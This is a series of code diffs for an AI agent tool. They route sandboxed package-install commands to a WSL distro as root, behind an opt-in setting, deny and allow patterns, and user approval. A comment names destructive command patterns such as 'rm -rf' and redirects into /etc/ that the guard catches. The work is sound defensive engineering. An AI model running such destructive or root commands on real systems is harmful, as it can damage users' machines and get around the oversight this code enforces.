+           :meth:`_normalize_system_install`).
+
+        A refusal exits with an error — the command does NOT fall through to
+        sandbox execution, because it was headed for a root run and the
+        sandbox would silently fail anyway (no root, read-only /usr).
+        """
+        lower = command.strip().lower()
+        for pattern in self._deny_patterns_without_sudo:
+            if re.search(pattern, lower):
+                return "Error: 命令被安全护栏拦截（系统安装路由拒绝了危险模式）"
+        if self.allow_patterns and not any(
+            re.search(p, lower) for p in self.allow_patterns
+        ):
+            return "Error: 命令被安全护栏拦截（不在白名单中）"
+        # dist-upgrade/full-upgrade classify as install-family (so they reach
+        # this guard instead of a confusing in-sandbox failure) but remove
+        # packages and rewrite the whole distro as root — refused here with a
+        # specific message (review #759 N1).
+        stripped = command.strip()
+        prefix = _SYSTEM_INSTALL_PREFIX_RE.match(stripped)
+        if prefix:
+            stripped = stripped[prefix.end():]
+        if re.search(r"\b(?:dist-upgrade|full-upgrade)\b", stripped):
+            return _SYSTEM_INSTALL_DISTUPGRADE_MSG
+        if self._normalize_system_install(command) is None:
+            return _SYSTEM_INSTALL_SINGLE_MSG
+        return None
+
+    async def _resolve_sandbox(self, session_key: str | None):
+        """Get the live sandbox for a session (creates it on demand)."""
+        if self._sandbox_manager is None:
+            return None
+        if session_key:
+            return await self._sandbox_manager.get_or_create(session_key)
+        return self._sandbox_manager.active_sandbox
+
+    async def _maybe_route_system_install(
+        self,
+        command: str,
+        *,
+        sandbox_selection,
+        session_key: str | None,
+        cancel_event: asyncio.Event | None = None,
+    ) -> _ExecResult | None:
+        """Route system package installs to the WSL distro as root (#759).
+
+        Returns an :class:`_ExecResult` when the command was handled
+        (routed to the distro, or intercepted with guidance), None when
+        normal execution should proceed.
+
+        Decision chain:
+        1. Only when a bwrap sandbox context is active (never overrides an
+           orchestrator's explicit NONE/RESTRICTED selection).
+        2. Only for install-family commands (see :meth:`_is_system_install_command`).
+        3. A disabled sandbox manager (user chose direct host exec) → the
+           routing never participates, not even to intercept (review #759
+           O2).
+        4. ``allow_system_installs`` off → intercept with an actionable
+           message, BEFORE any sandbox resolution or approval: the command
+           is dead on arrival, no sandbox should be created for it, and the
+           message must point at the real fix (enable the option), not at
+           the sandbox (review #759 O1).
+        5. Desktop approval (when ``approval_callback`` is wired) runs here
+           too — routed commands do NOT bypass the approval system; the
+           user can decline, which intercepts before any sandbox is
+           resolved or any root command is spawned.
+        6. A live bwrap sandbox must resolve — when none is available the
+           command is intercepted with a clear message instead of falling
+           through to the normal path's Windows-cmd degradation (review
+           #759 N2).
+        7. WSL-only — native Linux sandboxes get a WSL-only message.
+        8. Deny-pattern re-check (minus sudo), allow_patterns, dist-upgrade
+           refusal, and single-command normalization (see
+           :meth:`_guard_system_install_command`) — dangerous, option-
+           carrying or system-rewriting commands are refused.
+        9. Cancel check, then the normalized command is executed as root in
+           the WSL distro.
+        """
+        if self._sandbox_manager is None:
+            return None
+        if not self._is_system_install_command(command):
+            return None
+        if (
+            sandbox_selection is not None
+            and sandbox_selection.sandbox_type != SandboxType.BWRAP
+        ):
+            return None
+
+        # O2: sandbox disabled (enabled=False) means direct host exec was
+        # chosen — neither routing nor intercepting installs is wanted; the
+        # command goes through the normal path like any other.
+        if not getattr(self._sandbox_manager, "enabled", False):
+            return None
+
+        # O1: check the allow toggle before touching the sandbox.  When it
+        # is off the command is dead on arrival — no sandbox is created for
+        # it, no approval is prompted, and the user is pointed at the real
+        # fix (enable allow_system_installs) rather than at the sandbox.
+        if not getattr(self._sandbox_manager, "allow_system_installs", False):
+            return _ExecResult(output=_SYSTEM_INSTALL_NOT_ENABLED_MSG, exit_code=1)
+
+        # Phase 77 (#759) + review F2: routed commands must not bypass the
+        # approval system.  Same call the normal path uses; commands that
+        # hit DANGEROUS_PATTERNS (rm -rf, redirects into /etc/, ...) go
+        # through the user's approval callback just like any other command.
+        if self.approval_callback is not None:
+            import functools
+
+            from miqi.agent.command_approval import check_dangerous_command
+            loop = asyncio.get_event_loop()
+            check_fn = functools.partial(
+                check_dangerous_command,
+                command,
+                approval_callback=self.approval_callback,
+            )
+            approval_result = await loop.run_in_executor(None, check_fn)
+            if not approval_result.get("approved", True):
+                msg = approval_result.get(
+                    "message",
+                    "Error: 命令被拦截——用户拒绝了审批。",
+                )
+                return _ExecResult(output=msg, exit_code=1)
+
+        sandbox = await self._resolve_sandbox(session_key)
+        if sandbox is None or not getattr(sandbox, "is_running", False):
+            # No live sandbox to attach the install to.  Previously this
+            # fell through to the normal path, which degrades to Windows
+            # cmd when no sandbox is available — "sudo is not recognized"
+            # despite the environment claiming installs are routed (review
+            # #759 N2).  Intercept with a clear message instead.
+            return _ExecResult(output=_SYSTEM_INSTALL_NO_SANDBOX_MSG, exit_code=1)
+
+        if not getattr(sandbox, "supports_system_installs", False):
+            return _ExecResult(output=_SYSTEM_INSTALL_WSL_ONLY_MSG, exit_code=1)
+
+        guard_error = self._guard_system_install_command(command)
+        if guard_error:
+            return _ExecResult(output=guard_error, exit_code=1)
+
+        normalized = self._normalize_system_install(command)
+        if normalized is None:  # defensive — the guard already refuses these
+            return _ExecResult(output=_SYSTEM_INSTALL_SINGLE_MSG, exit_code=1)
+
+        if cancel_event is not None and cancel_event.is_set():
+            return _ExecResult(
+                output="Error: 命令在启动前被取消。",
+                exit_code=-1, cancelled=True,
+            )
+
+        return await self._execute_system_install(sandbox, normalized)
+
+    async def _execute_system_install(
+        self, sandbox, command: str,
+    ) -> _ExecResult:
+        """Run a normalized install command as root in the WSL distro (#759).
+
+        *command* is the canonical form produced by
+        :meth:`_normalize_system_install` (already prefix-stripped, only
+        allowlisted flags and package tokens) — it is safe to embed in
+        ``bash -c``.  The non-interactive flag (-y / --non-interactive /
+        --noconfirm) is injected so the root run never hangs on a TTY
+        prompt.
+
+        The result is buffered (no streaming) with a dedicated long timeout;
+        texlive-scale installs can emit tens of MB of progress text (dpkg
+        per-package lines, ``\\r`` progress bars pass through verbatim), so
+        the peak is bounded by that output size, and the agent sees nothing
+        until the run finishes.  A cancelled install can leave the
+        distro-side run finishing in the background — acceptable, since the
+        install is idempotent and lands in the persistent distro either way.
+        """
+        install_cmd = self._inject_noninteractive_flags(command)
+
+        start = time.monotonic()
+        rc, out, err = await sandbox.run_in_distro_root(
+            install_cmd, timeout=_SYSTEM_INSTALL_TIMEOUT,
+        )
+        duration_ms = int((time.monotonic() - start) * 1000)
+
+        if rc != 0:
+            logger.warning(
+                "System install failed exit={} duration={}ms: {}",
+                rc, duration_ms, command[:200],
+            )
+
+        if rc == 0:
+            output_parts = [
+                "[system install] 已以 root 在 WSL 发行版中执行（非沙箱内）；"
+                "安装跨会话持久，装完即可在沙箱内使用。"
+            ]
+        else:
+            # Review F4: never claim success on failure — the agent must
+            # not misread a failed install as completed.
+            output_parts = [
+                f"[system install] 失败（exit {rc}）——命令以 root 在 WSL "
+                "发行版中执行，未安装成功，沙箱内暂不可用。"
+            ]
+        if out.strip():
+            output_parts.append(out.rstrip())
+        if err.strip():
+            output_parts.append(f"STDERR:\n{err.rstrip()}")
+        if rc != 0:
+            output_parts.append(f"\nExit code: {rc}")
+
+        return _ExecResult(
+            output="\n".join(output_parts),
+            exit_code=rc,
+            duration_ms=duration_ms,
+            # Review F7: the telemetry context is the bwrap sandbox whose
+            # distro this install lands in, not "none".
+            sandbox_type="bwrap",
+        )
+
     def _guard_command(self, command: str, cwd: str) -> str | None:
         """Best-effort safety guard for potentially destructive commands."""
         cmd = command.strip()
@@ -1309,10 +1849,10 @@ class ExecTool(Tool):
 
         # Resolve the sandbox workspace path
         from miqi.agent.tools.filesystem import (
-            _persist_tracked_file,
-            _sandbox_to_host_path,
-            _resolve_sandbox_path,
             _get_session_workspace,
+            _persist_tracked_file,
+            _resolve_sandbox_path,
+            _sandbox_to_host_path,
         )
 
         session_ws = _get_session_workspace(workspace, sandbox)

--- a/miqi/agent/tools/shell.py
+++ b/miqi/agent/tools/shell.py
@@ -1769,11 +1769,14 @@ class ExecTool(Tool):
         verbatim), so the accumulated output is tail-bounded by the sandbox
         layer and the agent sees nothing until the run finishes.  During
         the run a progress delta is emitted roughly every
-        :data:`_INSTALL_PROGRESS_INTERVAL_SECONDS` so the bridge's chat
-        drain idle timeout (600 s) does not end a long install's turn as a
-        TIMEOUT while the root install continues in the distro (CodeRabbit
-        #820).  A cancelled install can leave the distro-side run finishing
-        in the background — acceptable, since the install is idempotent and
+        :data:`_INSTALL_PROGRESS_INTERVAL_SECONDS` — output-triggered
+        through the distro run's chunk callback AND timer-driven by a
+        background heartbeat task, so even a completely silent install
+        (slow downloads, quiet apt phases) keeps the bridge's chat drain
+        idle timeout (600 s) from ending the turn as a TIMEOUT while the
+        root install continues in the distro (CodeRabbit #820).  A
+        cancelled install can leave the distro-side run finishing in the
+        background — acceptable, since the install is idempotent and
         lands in the persistent distro either way.
         """
         install_cmd = self._inject_noninteractive_flags(command)
@@ -1781,7 +1784,7 @@ class ExecTool(Tool):
         start = time.monotonic()
         last_progress = 0.0
 
-        async def _progress(text: str, stream_name: str) -> None:
+        async def _emit_progress(stream_name: str) -> None:
             """Throttled heartbeat: one tiny delta per interval keeps the
             turn alive without flooding the frontend with dpkg output."""
             nonlocal last_progress
@@ -1801,9 +1804,32 @@ class ExecTool(Tool):
                 ),
             ))
 
-        rc, out, err = await sandbox.run_in_distro_root(
-            install_cmd, timeout=_SYSTEM_INSTALL_TIMEOUT, on_output=_progress,
-        )
+        async def _progress(text: str, stream_name: str) -> None:
+            """Output-triggered heartbeat: reused for the output path so
+            both sources share one throttle."""
+            await _emit_progress(stream_name)
+
+        async def _heartbeat() -> None:
+            """Timer-driven fallback: emits a progress delta even when the
+            distro writes nothing for a long stretch (slow downloads,
+            silent apt phases) — output callbacks alone would let the
+            bridge's 600 s drain idle timeout end the turn while the root
+            install keeps running (CodeRabbit #820)."""
+            while True:
+                await asyncio.sleep(_INSTALL_PROGRESS_INTERVAL_SECONDS)
+                await _emit_progress("stdout")
+
+        heartbeat_task = asyncio.create_task(_heartbeat())
+        try:
+            rc, out, err = await sandbox.run_in_distro_root(
+                install_cmd, timeout=_SYSTEM_INSTALL_TIMEOUT, on_output=_progress,
+            )
+        finally:
+            heartbeat_task.cancel()
+            try:
+                await heartbeat_task
+            except asyncio.CancelledError:
+                pass
         duration_ms = int((time.monotonic() - start) * 1000)
 
         if rc != 0:

--- a/miqi/bridge/loop.py
+++ b/miqi/bridge/loop.py
@@ -1793,6 +1793,7 @@ class BridgeRuntimeLoop:
                 max_sandboxes=getattr(sb_cfg, "max_sandboxes", 10),
                 auto_cleanup=getattr(sb_cfg, "auto_cleanup", True),
                 auto_install_deps=getattr(sb_cfg, "auto_install_deps", True),
+                allow_system_installs=getattr(sb_cfg, "allow_system_installs", False),
                 wsl_distro=getattr(sb_cfg, "wsl_distro", ""),
                 wsl_base_dir=getattr(sb_cfg, "wsl_base_dir", "/tmp/miqi-sandboxes"),
             )

--- a/miqi/bridge/server.py
+++ b/miqi/bridge/server.py
@@ -233,6 +233,7 @@ class BridgeState:
             max_sandboxes=getattr(sb_cfg, "max_sandboxes", 10),
             auto_cleanup=getattr(sb_cfg, "auto_cleanup", True),
             auto_install_deps=getattr(sb_cfg, "auto_install_deps", True),
+            allow_system_installs=getattr(sb_cfg, "allow_system_installs", False),
             wsl_distro=getattr(sb_cfg, "wsl_distro", ""),
             wsl_base_dir=getattr(sb_cfg, "wsl_base_dir", "/tmp/miqi-sandboxes"),
             session_workspace_resolver=_session_workspace,

--- a/miqi/config/schema.py
+++ b/miqi/config/schema.py
@@ -429,6 +429,13 @@ class SandboxConfig(Base):
 
     enabled: bool = True
     share_net: bool = False  # Allow network access inside sandbox (disabled by default for security)
+    # Route system package installs (apt-get/apt/dnf/... install) to the WSL
+    # distro as root instead of failing inside the unprivileged read-only
+    # bwrap sandbox.  Installs persist across sessions and are immediately
+    # visible inside the sandbox via its ro-bind of the distro's system dirs
+    # (#759).  Disabled by default: running root commands in the WSL distro
+    # is a deliberate privilege the user must opt into.
+    allow_system_installs: bool = False
     max_sandboxes: int = 10  # Maximum concurrent sandboxes
     auto_cleanup: bool = True  # Clean up sandbox on session archive/delete
     auto_install_deps: bool = True  # Auto-install bwrap/coreutils/rsync in WSL if missing

--- a/miqi/sandbox/bwrap.py
+++ b/miqi/sandbox/bwrap.py
@@ -45,7 +45,9 @@ import tempfile
 import threading
 import time
 import uuid
+from collections import deque
 from pathlib import Path
+from typing import Any, Awaitable, Callable, Optional
 
 from loguru import logger
 
@@ -60,6 +62,13 @@ _auto_install_cache: dict[str, bool] = {}
 """Cache auto-install results per distro to avoid repeated apt-get calls."""
 
 _install_lock = threading.Lock()
+
+#: Tail-bounded accumulation for :meth:`BwrapSandbox._run_linux_command`.
+#: A texlive-scale distro install can emit tens of MB of dpkg progress
+#: text; the agent never needs more than the tail (the failure message is
+#: at the end).  Keep only the trailing chunk so memory and the agent's
+#: context stay bounded (CodeRabbit review #820).
+_MAX_COMMAND_OUTPUT_CHARS = 1_000_000
 
 #: WSL distro readiness probe: bwrap + python3/pip toolchain.
 #:
@@ -356,6 +365,7 @@ class BwrapSandbox:
         cmd: str,
         timeout: float = 30.0,
         as_root: bool = False,
+        on_output: Optional[Callable[[str, str], Awaitable[None]]] = None,
     ) -> tuple[int, str, str]:
         """Run a shell command inside the Linux environment.
 
@@ -369,6 +379,14 @@ class BwrapSandbox:
         system directories (#759).  Native Linux does not have a rootful
         distro layer; callers must check :attr:`supports_system_installs`
         first.
+
+        ``on_output``, when given, is awaited with ``(text, stream_name)``
+        for every read chunk (``stream_name`` is "stdout" or "stderr").
+        The install path uses it to emit periodic progress so a long
+        texlive-scale install keeps the chat turn alive (CodeRabbit #820);
+        ``None`` keeps the previous fully-buffered behaviour.  The
+        accumulated output is tail-bounded to
+        :data:`_MAX_COMMAND_OUTPUT_CHARS` regardless.
         """
         if self._use_wsl:
             wsl_args = self._wsl_prefix()
@@ -380,6 +398,28 @@ class BwrapSandbox:
         else:
             full_args = ["bash", "-c", cmd]
 
+        async def _drain(stream: Any, name: str, sink: deque[str]) -> None:
+            """Read *stream* incrementally, keep only the trailing output."""
+            if stream is None:
+                return
+            total = 0
+            try:
+                while True:
+                    chunk = await stream.read(4096)
+                    if not chunk:
+                        break
+                    text = chunk.decode("utf-8", errors="replace")
+                    if on_output is not None:
+                        await on_output(text, name)
+                    sink.append(text)
+                    total += len(text)
+                    while total > _MAX_COMMAND_OUTPUT_CHARS and len(sink) > 1:
+                        total -= len(sink.popleft())
+            except Exception:
+                pass
+
+        out_chunks: deque[str] = deque()
+        err_chunks: deque[str] = deque()
         try:
             process = await _create_subprocess_exec(
                 *full_args,
@@ -387,9 +427,21 @@ class BwrapSandbox:
                 stderr=asyncio.subprocess.PIPE,
             )
             try:
-                stdout_bytes, stderr_bytes = await asyncio.wait_for(
-                    process.communicate(), timeout=timeout
+                await asyncio.wait_for(
+                    asyncio.gather(
+                        _drain(process.stdout, "stdout", out_chunks),
+                        _drain(process.stderr, "stderr", err_chunks),
+                    ),
+                    timeout=timeout,
                 )
+                # Reap the process: the drains finish at pipe EOF, which
+                # can precede the process actually exiting — returncode
+                # would still be None.  Short wait_for: the exit code is
+                # available almost immediately after EOF.
+                try:
+                    await asyncio.wait_for(process.wait(), timeout=5.0)
+                except asyncio.TimeoutError:
+                    pass
             except asyncio.TimeoutError:
                 process.kill()
                 try:
@@ -398,8 +450,8 @@ class BwrapSandbox:
                     pass
                 return (-1, "", f"Command timed out after {timeout}s")
 
-            stdout = stdout_bytes.decode("utf-8", errors="replace")
-            stderr = stderr_bytes.decode("utf-8", errors="replace")
+            stdout = "".join(out_chunks)
+            stderr = "".join(err_chunks)
             return (process.returncode if process.returncode is not None else -1, stdout, stderr)
         except Exception as exc:
             return (-1, "", f"Failed to run command: {exc}")
@@ -427,6 +479,7 @@ class BwrapSandbox:
         self,
         command: str,
         timeout: float = 1200.0,
+        on_output: Optional[Callable[[str, str], Awaitable[None]]] = None,
     ) -> tuple[int, str, str]:
         """Run a command as root in the WSL distro, OUTSIDE the bwrap sandbox.
 
@@ -445,11 +498,18 @@ class BwrapSandbox:
         :data:`_install_lock` (the same lock the auto-install path uses):
         two parallel ``apt-get`` runs race on dpkg's lock and one fails
         with "Could not get lock /var/lib/dpkg/lock" (review #759 N3).  The
-        lock is acquired off the event loop so a queued install never
-        blocks the loop while waiting.
+        wait polls the non-blocking acquire on the event loop — same
+        strategy as :meth:`_ensure_wsl_deps` — so a queued install neither
+        blocks the loop nor parks a default-executor thread for the whole
+        wait (CodeRabbit review #820).
+
+        ``on_output`` is forwarded to :meth:`_run_linux_command` — the
+        install path streams chunk callbacks through it so a long install
+        can emit periodic progress and keep the chat turn alive.
 
         Returns:
-            (exit_code, stdout, stderr)
+            (exit_code, stdout, stderr) — output is tail-bounded to
+            :data:`_MAX_COMMAND_OUTPUT_CHARS`.
         """
         if not self.supports_system_installs:
             return (
@@ -463,12 +523,14 @@ class BwrapSandbox:
         full_cmd = f"export DEBIAN_FRONTEND=noninteractive; {command}"
 
         # threading.Lock (distro-wide, shared with the auto-install path) —
-        # acquired via the executor so the wait never blocks the event loop.
-        loop = asyncio.get_event_loop()
-        await loop.run_in_executor(None, _install_lock.acquire)
+        # polled without blocking the event loop and without parking a
+        # default-executor thread for the whole wait (which is shared with
+        # workspace snapshots and approval checks).
+        while not _install_lock.acquire(blocking=False):
+            await asyncio.sleep(1.0)
         try:
             return await self._run_linux_command(
-                full_cmd, timeout=timeout, as_root=True,
+                full_cmd, timeout=timeout, as_root=True, on_output=on_output,
             )
         finally:
             _install_lock.release()

--- a/miqi/sandbox/bwrap.py
+++ b/miqi/sandbox/bwrap.py
@@ -36,13 +36,13 @@ from __future__ import annotations
 # pylint: disable=no-member,import-error
 # Linux-specific APIs (os.killpg, signal.SIGKILL, os.getpgid) and
 # loguru are only available on the target platform / in the WSL venv.
-
 import asyncio
 import os
 import platform
 import signal
 import subprocess
 import tempfile
+import threading
 import time
 import uuid
 from pathlib import Path
@@ -59,7 +59,6 @@ class BwrapSandboxError(Exception):
 _auto_install_cache: dict[str, bool] = {}
 """Cache auto-install results per distro to avoid repeated apt-get calls."""
 
-import threading
 _install_lock = threading.Lock()
 
 #: WSL distro readiness probe: bwrap + python3/pip toolchain.
@@ -356,14 +355,28 @@ class BwrapSandbox:
         self,
         cmd: str,
         timeout: float = 30.0,
+        as_root: bool = False,
     ) -> tuple[int, str, str]:
         """Run a shell command inside the Linux environment.
 
         On Windows, runs via ``wsl.exe -d <distro> -- bash -c "..."``.
         On Linux, runs via ``bash -c "..."``.
+
+        ``as_root=True`` (Windows/WSL only) adds ``-u root`` to the wsl.exe
+        invocation so the command runs as the distro's root user — used for
+        system package installs that persist in the distro and become
+        visible inside every bwrap sandbox via its ro-bind of the distro's
+        system directories (#759).  Native Linux does not have a rootful
+        distro layer; callers must check :attr:`supports_system_installs`
+        first.
         """
         if self._use_wsl:
-            full_args = self._wsl_prefix() + ["bash", "-c", cmd]
+            wsl_args = self._wsl_prefix()
+            if as_root:
+                wsl_args = ["wsl.exe", "-d", self._detected_distro, "-u", "root", "--"] \
+                    if self._detected_distro else \
+                    ["wsl.exe", "-u", "root", "--"]
+            full_args = wsl_args + ["bash", "-c", cmd]
         else:
             full_args = ["bash", "-c", cmd]
 
@@ -390,6 +403,75 @@ class BwrapSandbox:
             return (process.returncode if process.returncode is not None else -1, stdout, stderr)
         except Exception as exc:
             return (-1, "", f"Failed to run command: {exc}")
+
+    @property
+    def supports_system_installs(self) -> bool:
+        """True when package installs can be routed to a rootful WSL distro.
+
+        The bwrap sandbox itself runs unprivileged (uid 1000) against
+        read-only system dirs, so ``apt-get`` etc. can never work inside it
+        (#759).  On Windows the WSL distro the sandbox ro-binds its system
+        dirs from *is* a persistent root-capable layer: installing there
+        once makes the toolchain visible in every sandbox session.  Native
+        Linux has no such layer (the host must not receive root installs
+        from the sandboxed agent), so the capability is WSL-only.
+        """
+        return bool(self._use_wsl and self._detected_distro)
+
+    @property
+    def distro_name(self) -> str:
+        """The WSL distro backing this sandbox (empty when not WSL)."""
+        return self._detected_distro or ""
+
+    async def run_in_distro_root(
+        self,
+        command: str,
+        timeout: float = 1200.0,
+    ) -> tuple[int, str, str]:
+        """Run a command as root in the WSL distro, OUTSIDE the bwrap sandbox.
+
+        Used to install system toolchains (LaTeX, compilers, ...) that the
+        unprivileged read-only sandbox cannot install itself.  Because the
+        sandbox ro-binds the distro's system directories (/usr, /lib, /etc,
+        ...), anything installed here is immediately and persistently
+        available to every sandbox command — no sandbox restart needed.
+
+        Only available on Windows + WSL (:attr:`supports_system_installs`);
+        native Linux returns an error result since there is no rootful
+        distro layer and the host must never receive root installs from the
+        sandboxed agent.
+
+        Concurrent distro-side installs are serialized on
+        :data:`_install_lock` (the same lock the auto-install path uses):
+        two parallel ``apt-get`` runs race on dpkg's lock and one fails
+        with "Could not get lock /var/lib/dpkg/lock" (review #759 N3).  The
+        lock is acquired off the event loop so a queued install never
+        blocks the loop while waiting.
+
+        Returns:
+            (exit_code, stdout, stderr)
+        """
+        if not self.supports_system_installs:
+            return (
+                -1,
+                "",
+                "System package installs require Windows + WSL (the sandbox's "
+                "WSL distro). Not supported on native Linux.",
+            )
+
+        # Non-interactive frontend so apt/dnf never hang on a TTY prompt.
+        full_cmd = f"export DEBIAN_FRONTEND=noninteractive; {command}"
+
+        # threading.Lock (distro-wide, shared with the auto-install path) —
+        # acquired via the executor so the wait never blocks the event loop.
+        loop = asyncio.get_event_loop()
+        await loop.run_in_executor(None, _install_lock.acquire)
+        try:
+            return await self._run_linux_command(
+                full_cmd, timeout=timeout, as_root=True,
+            )
+        finally:
+            _install_lock.release()
 
     async def _write_wsl_file_via_stdin(
         self,
@@ -1834,8 +1916,8 @@ class BwrapSandbox:
                 return False
         else:
             # Legacy guard — only allow paths under known sandbox prefixes
-            _ALLOWED_PREFIXES = ("/tmp/miqi-sandboxes/", "/tmp/miqi-sandbox")
-            if not any(linux_dir.startswith(p) for p in _ALLOWED_PREFIXES):
+            allowed_prefixes = ("/tmp/miqi-sandboxes/", "/tmp/miqi-sandbox")
+            if not any(linux_dir.startswith(p) for p in allowed_prefixes):
                 logger.warning(
                     "Refusing to cleanup path outside allowed prefixes: {}", linux_dir
                 )

--- a/miqi/sandbox/bwrap.py
+++ b/miqi/sandbox/bwrap.py
@@ -70,6 +70,13 @@ _install_lock = threading.Lock()
 #: context stay bounded (CodeRabbit review #820).
 _MAX_COMMAND_OUTPUT_CHARS = 1_000_000
 
+#: Max time to wait for the distro-wide install lock before giving up,
+#: consistent with :meth:`_ensure_wsl_deps`' bounded wait (180 s).  Two
+#: parallel installs normally finish within it; beyond that something is
+#: stuck, and the agent gets a clear error instead of a silent hang that
+#: would otherwise last until the outer install timeout (CodeRabbit #820).
+_INSTALL_LOCK_WAIT_TIMEOUT = 180.0
+
 #: WSL distro readiness probe: bwrap + python3/pip toolchain.
 #:
 #: Used by _detect_wsl_distro / _find_any_wsl_distro and by
@@ -448,7 +455,15 @@ class BwrapSandbox:
                     await asyncio.wait_for(process.wait(), timeout=5.0)
                 except asyncio.TimeoutError:
                     pass
-                return (-1, "", f"Command timed out after {timeout}s")
+                # Keep the tail captured so far: a long-running command
+                # that overruns its budget still leaves the agent the last
+                # diagnostic lines instead of an empty timeout message
+                # (CodeRabbit #820).
+                return (
+                    -1,
+                    "".join(out_chunks),
+                    f"{''.join(err_chunks)}\nCommand timed out after {timeout}s",
+                )
 
             stdout = "".join(out_chunks)
             stderr = "".join(err_chunks)
@@ -525,9 +540,26 @@ class BwrapSandbox:
         # threading.Lock (distro-wide, shared with the auto-install path) —
         # polled without blocking the event loop and without parking a
         # default-executor thread for the whole wait (which is shared with
-        # workspace snapshots and approval checks).
+        # workspace snapshots and approval checks).  The wait is bounded by
+        # real elapsed time, like _ensure_wsl_deps' — a stuck holder
+        # (crashed apt-get) surfaces as a clear error instead of a silent
+        # hang until the outer install timeout — and emits progress so the
+        # agent knows the install is queued, not stalled (CodeRabbit #820).
+        deadline = time.monotonic() + _INSTALL_LOCK_WAIT_TIMEOUT
         while not _install_lock.acquire(blocking=False):
+            if time.monotonic() >= deadline:
+                return (
+                    -1,
+                    "",
+                    "Timed out waiting for the distro install lock "
+                    "(another install is still running)",
+                )
             await asyncio.sleep(1.0)
+            if on_output is not None:
+                await on_output(
+                    "[system install] 等待其他安装完成（distro 锁）……\n",
+                    "stdout",
+                )
         try:
             return await self._run_linux_command(
                 full_cmd, timeout=timeout, as_root=True, on_output=on_output,

--- a/miqi/sandbox/manager.py
+++ b/miqi/sandbox/manager.py
@@ -36,7 +36,6 @@ import shutil
 import sys
 import tempfile
 import threading
-import time
 from datetime import datetime, timezone
 from pathlib import Path
 from typing import Any
@@ -222,12 +221,36 @@ def describe_exec_environment(
     on Windows when available, otherwise Windows cmd.
     """
     if sandbox_is_active(sandbox_manager):
+        parts = [
+            (
+                "exec 在 WSL 沙箱中运行——默认工作区下沙箱 /home/miqi/workspace "
+                "与文件工具目录不同（沙箱为独立目录，看不到文件工具写入的文件），"
+                "自定义工作区下二者相同；exec 中访问文件请用主机路径（如 /mnt/c/...），"
+                "或改用文件工具。"
+            )
+        ]
+        # Phase 77 (#759): system package install routing.  Tell the AI the
+        # ACTUAL way to obtain system toolchains (LaTeX, compilers, ...):
+        # inside the sandbox they are unprivileged + system dirs are
+        # read-only, so apt-get can never work there; when enabled, install
+        # commands are routed to the WSL distro as root and persist.
+        if getattr(sandbox_manager, "allow_system_installs", False):
+            parts.append(
+                "系统包安装已开启：需要系统工具链（如 LaTeX/xelatex、编译器）时，"
+                "直接运行 sudo apt-get install -y <包名>（或 apt/dnf/pacman 等），"
+                "该命令会以 root 在 WSL 发行版中执行（仅 Windows + WSL 生效），"
+                "安装一次跨会话持久，装完即可在沙箱内使用。"
+            )
+        else:
+            parts.append(
+                "沙箱内无法安装系统包（tools.sandbox.allow_system_installs 未开启）："
+                "sudo/apt-get install 会被拦截；如需 LaTeX 等系统工具链，"
+                "请让用户在配置中开启该选项。"
+            )
         return (
-            "exec 在 WSL 沙箱中运行——默认工作区下沙箱 /home/miqi/workspace "
-            "与文件工具目录不同（沙箱为独立目录，看不到文件工具写入的文件），"
-            "自定义工作区下二者相同；exec 中访问文件请用主机路径（如 /mnt/c/...），"
-            "或改用文件工具。"
-            + _skills_dirs_note(workspace, "mnt") + _python_note("mnt")
+            " ".join(parts)
+            + _skills_dirs_note(workspace, "mnt")
+            + _python_note("mnt")
         )
     if os.name == "nt":
         if find_git_bash() is not None:
@@ -282,6 +305,7 @@ class SandboxManager:
         wsl_base_dir: str = "/tmp/miqi-sandboxes",
         sandbox_distro_name: str = "AIShadowSandbox",
         auto_install_deps: bool = True,
+        allow_system_installs: bool = False,
         session_workspace_resolver: Any = None,
     ):
         self.workspace = workspace
@@ -294,6 +318,11 @@ class SandboxManager:
         self.wsl_base_dir = wsl_base_dir
         self.sandbox_distro_name = sandbox_distro_name
         self.auto_install_deps = auto_install_deps
+        # #759: when enabled, package install commands (apt-get/apt/dnf/...)
+        # are routed to the WSL distro as root so system toolchains install
+        # once and persist across sessions (visible in every sandbox via the
+        # distro's ro-bind system dirs).
+        self.allow_system_installs = allow_system_installs
 
         self._sandboxes: dict[str, BwrapSandbox] = {}
         self._active_key: str | None = None

--- a/tests/sandbox/test_system_install_routing.py
+++ b/tests/sandbox/test_system_install_routing.py
@@ -34,11 +34,16 @@ class FakeSandbox:
         self.supports_system_installs = supports_system_installs
         self.fail_rc = fail_rc
         self.install_calls: list[tuple[str, float]] = []
+        self.last_on_output = None
 
-    async def run_in_distro_root(self, command, timeout=1200.0):
+    async def run_in_distro_root(self, command, timeout=1200.0, on_output=None):
         self.install_calls.append((command, timeout))
+        self.last_on_output = on_output
         if self.fail_rc:
             return (self.fail_rc, "E: Unable to locate package evilpkg", "")
+        # simulate a streaming distro run: one chunk through the callback
+        if on_output is not None:
+            await on_output("Reading package lists...", "stdout")
         return (0, "Reading package lists... done\ninstalled texlive-xetex", "")
 
 
@@ -146,8 +151,9 @@ def test_is_system_install_command_rejects(command):
         ("apt install x", "apt install -y x"),
         ("dnf install x", "dnf install -y x"),
         ("yum install x", "yum install -y x"),
-        # zypper's silent flag is --non-interactive, NOT -y
-        ("zypper install python3", "zypper install --non-interactive python3"),
+        # zypper's silent flag is --non-interactive, NOT -y — and it is a
+        # GLOBAL option that must precede the command (CodeRabbit #820)
+        ("zypper install python3", "zypper --non-interactive install python3"),
         ("zypper -n install python3", "zypper -n install python3"),
         ("zypper --non-interactive install python3", "zypper --non-interactive install python3"),
         ("pacman -S texlive", "pacman -S --noconfirm texlive"),
@@ -490,6 +496,44 @@ async def test_route_result_sandbox_type_is_bwrap():
     assert result.sandbox_type == "bwrap"
 
 
+async def test_execute_system_install_emits_progress(monkeypatch):
+    """A long install must emit periodic deltas so the bridge's 600 s chat
+    drain idle timeout does not end the turn as a TIMEOUT while the root
+    install keeps running (CodeRabbit #820)."""
+    import miqi.agent.tools.shell as shell_mod
+    from miqi.protocol.events import ExecCommandOutputDeltaEvent
+
+    monkeypatch.setattr(shell_mod, "_INSTALL_PROGRESS_INTERVAL_SECONDS", 0.01)
+
+    emitted = []
+
+    class FakeEmitter:
+        async def emit(self, event):
+            emitted.append(event)
+
+    sandbox = FakeSandbox()
+    manager = FakeSandboxManager(allow_system_installs=True, sandbox=sandbox)
+    tool = ExecTool(working_dir=".", sandbox_manager=manager)
+
+    result = await tool._maybe_route_system_install(
+        "sudo apt-get install -y texlive-xetex",
+        sandbox_selection=_make_selection(),
+        session_key="k",
+        event_emitter=FakeEmitter(),
+        turn_id="t1",
+        tool_call_id="c1",
+    )
+    assert result is not None
